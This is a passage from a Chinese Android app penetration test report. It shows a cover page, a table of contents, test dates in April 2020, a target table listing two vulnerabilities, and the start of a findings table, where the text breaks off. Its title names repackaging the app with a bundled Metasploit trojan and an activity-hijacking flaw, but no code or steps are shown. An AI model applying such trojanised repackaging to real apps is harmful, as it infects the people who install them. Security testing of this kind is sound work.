原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞
<div style="layout-grid:15.6pt;page:WordSection1;"><p>
<br />
</p>
<div style="layout-grid:15.6pt;page:WordSection1;">
<p>
<strong><span style="line-height:2;font-size:16px;">文档编号: </span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong> </strong></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-size:16px;font-family:黑体;line-height:2;"><strong> </strong></span></b>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-size:16px;font-family:黑体;line-height:2;"><strong> </strong></span></b>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="font-size:26.0pt;font-family:黑体;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span><strong><span style="line-height:2;font-size:16px;">渗透测试</span></strong><span lang="EN-US"></span></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="font-size:26.0pt;font-family:黑体;"><strong><span style="line-height:2;font-size:16px;">技 术 报 告</span></strong><span lang="EN-US"></span></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span></b>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-size:14.0pt;font-family:黑体;"><strong><span style="line-height:2;font-size:16px;">二〇二〇年</span></strong><span lang="EN-US"></span></span>
</p>
</div>
<span lang="EN-US" style="font-family:黑体;font-size:15.0pt;"><br clear="all" style="page-break-before:always;" />
</span>
<div style="layout-grid:15.6pt;page:WordSection2;">
</div>
<span lang="EN-US" style="font-family:黑体;font-size:18.0pt;"><br clear="all" style="page-break-before:auto;" />
</span>
<div style="layout-grid:15.6pt;page:WordSection3;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-size:18.0pt;font-family:黑体;"><strong><span style="line-height:2;font-size:16px;">目 录</span></strong><span lang="EN-US"></span></span>
</p>
<w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t" id="-1430033174">
<p style="color:#2E74B5;font-family:Calibri Light,sans-serif;font-size:16.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:12.0pt;page-break-after:avoid;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span><span style="color:windowtext;font-size:10.5pt;line-height:107%;"><w:sdtpr></w:sdtpr></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:12.0pt;margin:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<!--><span lang="EN-US"><span style="mso-element:field-begin;"></span><span style="mso-spacerun:yes;"> </span>TOC \o "1-4" \h \z \u <span style="mso-element:field-separator;"></span></span><!--><span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350236"><strong><span style="line-height:2;font-size:16px;">1 </span></strong><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>概述</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF_Toc37350236 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>3</strong></span><!--><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span><span lang="EN-US" style="font-size:10.5pt;"></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:21.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350237"><span style="line-height:2;font-size:16px;"><strong>1.2</strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>测试时间</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350237 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>3</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:21.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350238"><span style="line-height:2;font-size:16px;"><strong>1.3</strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>测试对象</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350238 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>3</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:21.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350239"><span style="line-height:2;font-size:16px;"><strong>1.4</strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>测试结果</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350239 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>3</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:12.0pt;margin:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350240"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>2 </strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>检测结果</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF_Toc37350240 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>4</strong></span><!--><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span><span lang="EN-US" style="font-size:10.5pt;"></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:21.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350241"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>2.1 </strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>某某某</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350241 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>4</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:42.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350242"><span style="line-height:2;font-size:16px;"><strong>2.1.1</strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>检测目标</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350242 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>4</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:42.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350243"><span style="line-height:2;font-size:16px;"><strong>2.1.2</strong></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>检测结果</strong></span></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>... </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350243 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>4</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:63.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350244"><span style="line-height:2;font-size:16px;"><strong>2.1.2.1</strong></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>. </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350244 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>4</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin-bottom:0cm;margin-left:63.0pt;margin-right:0cm;margin-top:0cm;tab-stops:right dotted 414.8pt;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US"><a href="https://2k8.org/admin/#_Toc37350245"><span style="line-height:2;font-size:16px;"><strong>2.1.2.2</strong></span><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong>. </strong></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span> PAGEREF _Toc37350245 \h <span style="mso-element:field-separator;"></span></span><!--><span style="color:windowtext;display:none;text-decoration:none;line-height:2;font-size:16px;"><strong>6</strong></span><!--><span style="color:windowtext;display:none;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a><span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<!--><span lang="EN-US" style="font-size:12.0pt;mso-no-proof:yes;"><span style="mso-element:field-end;"></span></span><!--><span lang="EN-US"></span>
</p>
</w:sdt>
</div>
<span lang="EN-US" style="font-family:Calibri,sans-serif;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
<h1>
<a name="_Toc37350236"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1 </strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>概述</strong></span></span><span lang="EN-US"></span>
</h1>
<h2>
<a name="_Toc37350237"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1.2</strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>测试时间</strong></span></span><span lang="EN-US"></span>
</h2>
<table border="1" cellpadding="0" cellspacing="0" style="border:none;border-collapse:collapse;font-family:Calibri,sans-serif;font-size:10.5pt;">
<tbody>
<tr style="height:25.5pt;">
<td colspan="2" width="553" style="background:#D9D9D9;border:solid windowtext 1.0pt;height:25.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:414.8pt;">
<p align="center" style="text-align:center;">
<a name="_Toc456956533"></a><a name="_Toc457786855"></a><span style="line-height:2;font-size:16px;"><span style="color:black;font-size:16px;line-height:2;"><strong>渗透测试时间</strong></span></span><span lang="EN-US" style="font-size:15.0pt;"></span>
</p>
</td>
</tr>
<tr style="height:25.5pt;">
<td width="283" style="border:solid windowtext 1.0pt;border-top:none;height:25.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:212.4pt;">
<p align="center" style="text-align:center;">
<a name="_Toc456956534"></a><a name="_Toc457786856"></a><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>起始时间</strong></span></span><span lang="EN-US" style="font-family:宋体;font-size:10.5pt;"></span>
</p>
</td>
<td width="270" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:25.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:202.4pt;">
<p align="center" style="text-align:center;">
<a name="_Toc456956535"></a><a name="_Toc457786857"></a><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="font-family:宋体;font-size:16px;line-height:2;"><strong>2020</strong></span></span><span><span><span style="font-family:宋体;font-size:10.5pt;"><strong><span style="line-height:2;font-size:16px;">年</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>4</strong></span><strong><span style="line-height:2;font-size:16px;">月</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>6</strong></span><strong><span style="line-height:2;font-size:16px;">日</span></strong></span></span></span><span lang="EN-US" style="font-family:宋体;font-size:10.5pt;"></span>
</p>
</td>
</tr>
<tr style="height:25.5pt;">
<td width="283" style="border:solid windowtext 1.0pt;border-top:none;height:25.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:212.4pt;">
<p align="center" style="text-align:center;">
<a name="_Toc456956536"></a><a name="_Toc457786858"></a><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>结束时间</strong></span></span><span lang="EN-US" style="font-family:宋体;font-size:10.5pt;"></span>
</p>
</td>
<td width="270" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:25.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:202.4pt;">
<p align="center" style="text-align:center;">
<a name="_Toc456956537"></a><a name="_Toc457786859"></a><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="font-family:宋体;font-size:16px;line-height:2;"><strong>2020</strong></span></span><span><span><span style="font-family:宋体;font-size:10.5pt;"><strong><span style="line-height:2;font-size:16px;">年</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>4</strong></span><strong><span style="line-height:2;font-size:16px;">月</span></strong></span></span></span><span lang="EN-US" style="font-family:宋体;font-size:16px;line-height:2;"><strong>9</strong></span><span style="font-family:宋体;font-size:10.5pt;"><strong><span style="line-height:2;font-size:16px;">日</span></strong><span lang="EN-US"></span></span>
</p>
</td>
</tr>
</tbody>
</table>
<h2>
<a name="_Toc37350238"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1.3</strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>测试对象</strong></span></span><span lang="EN-US"></span>
</h2>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="font-family:宋体;font-size:16px;line-height:2;"><strong>此次测试目标为某某某安卓</strong></span><span lang="EN-US" style="font-size:16px;line-height:2;"><strong>APP</strong></span><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>进行渗透性测试,</strong></span><span lang="EN-US" style="font-size:16px;line-height:2;"><strong>APP</strong></span><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>存在安全漏洞数量如下表所示:</strong></span><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:center;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="font-family:宋体;line-height:2;font-size:16px;"><strong>表</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1-1 </strong></span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>检测对象</strong></span><span lang="EN-US" style="line-height:150%;"></span>
</p>
<table border="1" cellpadding="0" cellspacing="0" style="border:none;border-collapse:collapse;font-family:Calibri,sans-serif;font-size:10.5pt;">
<tbody>
<tr style="height:27.9pt;">
<td width="75" style="background:#D9D9D9;border:solid windowtext 1.0pt;height:27.9pt;padding:0cm 5.4pt 0cm 5.4pt;width:56.45pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>序号</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="132" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:27.9pt;padding:0cm 5.4pt 0cm 5.4pt;width:99.25pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>测试对象</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="255" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:27.9pt;padding:0cm 5.4pt 0cm 5.4pt;width:191.35pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>测试地址</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="91" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:27.9pt;padding:0cm 5.4pt 0cm 5.4pt;width:68.05pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>安全漏洞</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
</tr>
<tr style="height:47.3pt;">
<td width="75" style="border:solid windowtext 1.0pt;border-top:none;height:47.3pt;padding:0cm 5.4pt 0cm 5.4pt;width:56.45pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>1</strong></span>
</p>
</td>
<td width="132" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:47.3pt;padding:0cm 5.4pt 0cm 5.4pt;width:99.25pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<a name="_Hlk37346630"></a><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span><span><span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">安卓</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span></span><span lang="EN-US" style="font-family:宋体;"></span>
</p>
</td>
<td width="255" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:47.3pt;padding:0cm 5.4pt 0cm 5.4pt;width:191.35pt;">
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
<td width="91" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:47.3pt;padding:0cm 5.4pt 0cm 5.4pt;width:68.05pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>2</strong></span>
</p>
</td>
</tr>
</tbody>
</table>
<h2>
<a name="_Toc37350239"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1.4</strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>测试结果</strong></span></span><span lang="EN-US"></span>
</h2>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="font-family:宋体;font-size:16px;line-height:2;"><strong>在本次对某某某</strong></span><span lang="EN-US" style="font-size:16px;line-height:2;"><strong>APP</strong></span><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>透测试中发现,</strong></span><span lang="EN-US" style="font-size:16px;line-height:2;"><strong>APP</strong></span><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>安全防护存在一定问题,主要问题如下所示:</strong></span><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span>
</p>
<div align="center">
<table border="1" cellpadding="0" cellspacing="0" style="border:none;border-collapse:collapse;font-family:Calibri,sans-serif;font-size:10.5pt;">
<tbody>
<tr style="height:1.0cm;">
<td width="60" style="background:#D9D9D9;border:solid windowtext 1.0pt;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:45.35pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>序号</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
